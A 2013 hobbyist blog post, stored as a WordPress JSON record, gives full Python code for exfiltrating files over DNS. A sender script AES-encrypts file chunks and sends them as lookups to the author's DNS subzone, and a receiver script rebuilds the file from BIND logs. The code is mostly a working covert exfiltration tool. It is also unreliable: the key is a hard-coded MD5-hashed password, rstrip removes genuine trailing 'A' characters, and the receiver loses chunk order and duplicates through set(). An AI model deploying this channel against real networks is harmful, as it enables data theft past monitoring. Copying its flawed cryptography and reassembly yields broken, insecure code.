{"id":122,"date":"2013-09-10T18:25:13","date_gmt":"2013-09-10T18:25:13","guid":{"rendered":"http:\/\/www.hackwhackandsmack.com\/?p=122"},"modified":"2013-09-16T07:44:41","modified_gmt":"2013-09-16T07:44:41","slug":"file-exfiltration-through-dns-pycrypt","status":"publish","type":"post","link":"https:\/\/www.hackwhackandsmack.com\/?p=122","title":{"rendered":"File Exfiltration Through DNS + Pycrypto"},"content":{"rendered":"

Sometimes you come across someone elses blog and think that’s pretty cool I should go build that…. well I came across Exfiltrate Files With DNS and found it rather interesting – the link can be found here http:\/\/16s.us\/dns\/<\/a>. I decided that I really wanted to build this and make it work. I already have a cloud server and a domain name so it was just a case of creating a subzone and redirecting requests to the subzone(dns name server). I then installed BIND9 on my cloud server to answer the requests when they come in to the subzone.<\/p>\n

I only encountered one issue when building the solution and that was that the parsing of the reassemble script was capturing the wrong string during the FQDN split. This was trivial to fix and I carried on and got a working solution that was transferring files which by the way is just awesome!!<\/p>\n

I have been messing with python and was looking for something to play with so decided that it might be quite cool to implement an encryption phase that then requires a key to decrypt the file on the other side.<\/p>\n

The downsides:<\/p>\n

Both sides need to support python-dev and pycrypto…. well in my amendments to the script.<\/p>\n

The upside:<\/p>\n

An encrypted chat service or method for moving files should all the prereqs be met. As this is me just messing around I am happy to have as many prereqs as required to run the program.<\/p>\n

So with the same base infrastructure in place and pycrypto installed on either end I put togeather the following:<\/p>\n

The following script encrypts the data and encodes in base64 before sending across in a domain request.<\/p>\n

#!\/usr\/bin\/env python<\/em><\/span><\/p>\n

from Crypto.Cipher import AES<\/span><\/p>\n

import base64<\/span><\/p>\n

import socket<\/span><\/p>\n

from Crypto.Hash import MD5<\/span><\/p>\n

\u00a0<\/span><\/p>\n

DNS_ZONE = “file.hackwhackandsmack.com”<\/span><\/p>\n

socket.setdefaulttimeout(1)<\/span><\/p>\n

\u00a0<\/span><\/p>\n

#static password can be taken as an input later<\/span><\/p>\n

password = (‘Works for me!!’)<\/span><\/p>\n

#generate a 32 bit key<\/span><\/p>\n

secret = MD5.new(password).hexdigest()<\/span><\/p>\n

\u00a0<\/span><\/p>\n

#specify blocksize<\/span><\/p>\n

BLOCK_SIZE = 32<\/span><\/p>\n

#padding character<\/span><\/p>\n

PADDING = ‘A’<\/span><\/p>\n

pad = lambda s: s + (BLOCK_SIZE – len(s) % BLOCK_SIZE) * PADDING<\/span><\/p>\n

EncodeAES = lambda c, s: base64.urlsafe_b64encode(c.encrypt(pad(s)))<\/span><\/p>\n

\u00a0<\/span><\/p>\n

cipher = AES.new(secret)<\/span><\/p>\n

\u00a0<\/span><\/p>\n

def break_file(filename):<\/span><\/p>\n

try:<\/span><\/p>\n

fp = file(filename, ‘rb’)<\/span><\/p>\n

part = 0<\/span><\/p>\n

while 1:<\/span><\/p>\n

data = fp.read(32)<\/span><\/p>\n

if data:<\/span><\/p>\n

try:<\/span><\/p>\n

encoded = EncodeAES(cipher, data)<\/span><\/p>\n

part = part+1<\/span><\/p>\n

print part<\/span><\/p>\n

print ‘Encrypted string:’, encoded<\/span><\/p>\n

socket.gethostbyname(encoded + DNS_ZONE)<\/span><\/p>\n

except Exception:<\/span><\/p>\n

continue<\/span><\/p>\n

else:<\/span><\/p>\n

print “Complete”<\/span><\/p>\n

break<\/span><\/p>\n

fp.close()<\/span><\/p>\n

except Exception, e:<\/span><\/p>\n

print e<\/span><\/p>\n

\u00a0<\/span><\/p>\n

#run<\/span><\/p>\n

break_file(‘test.txt’)<\/span><\/p>\n

##EOF##<\/span><\/p>\n

 <\/p>\n

To reassemble on the other side I used the following code:<\/p>\n

 <\/p>\n

from Crypto.Cipher import AES<\/span><\/em><\/p>\n

import base64<\/em><\/span><\/p>\n

from Crypto.Hash import MD5<\/em><\/span><\/p>\n

\u00a0<\/em><\/span>password = (‘Works for me!!’)<\/em><\/p>\n

secret = MD5.new(password).hexdigest()<\/em><\/span><\/p>\n

BLOCK_SIZE = 32<\/em><\/span><\/p>\n

PADDING = ‘A’<\/em><\/span><\/p>\n

pad = lambda s: s + (BLOCK_SIZE – len(s) % BLOCK_SIZE) * PADDING<\/em><\/span><\/p>\n

DecodeAES = lambda c, e: c.decrypt(base64.urlsafe_b64decode(e)).rstrip(PADDING)<\/em><\/span><\/p>\n

cipher = AES.new(secret)<\/em><\/span><\/p>\n

file_chunks = []<\/em><\/span><\/p>\n

def back(chunk):<\/em><\/span><\/p>\n

encoded = chunk.split(“.”)[0]<\/em><\/span><\/p>\n

decoded = DecodeAES(cipher, encoded)<\/em><\/span><\/p>\n

file_chunks.append(decoded)<\/em><\/span><\/p>\n

queries = []<\/em><\/span><\/p>\n

fp = open(“log-encrypt.txt”)<\/em><\/span><\/p>\n

lines = fp.readlines()<\/em><\/span><\/p>\n

fp.close()<\/em><\/span><\/p>\n

 <\/p>\n

for line in lines:<\/em><\/span><\/p>\n

if “file.hackwhackandsmack.com” in line:<\/em><\/span><\/p>\n

if “cache” in line:<\/em><\/span><\/p>\n

FQDN = line.split()[9]<\/em><\/span><\/p>\n

queries.append(FQDN.strip())<\/em><\/span><\/p>\n

\u00a0<\/em><\/span><\/p>\n

uqueries = set(queries)<\/em><\/span><\/p>\n

\u00a0<\/em><\/span>for i in uqueries:<\/em><\/p>\n

back(i)<\/em><\/span><\/p>\n

\u00a0<\/em><\/span>file_list = reversed(file_chunks)<\/em><\/p>\n

file = “”.join(file_list)<\/em><\/span><\/p>\n

print file<\/em><\/span><\/p>\n

##EOF##<\/em><\/span><\/p>\n

 <\/p>\n

This is definetly not the best implementation of AES but it works and meets my minimum requirements that I set out at the start. Time at the moment will impact any further improvement in the near future.<\/p>\n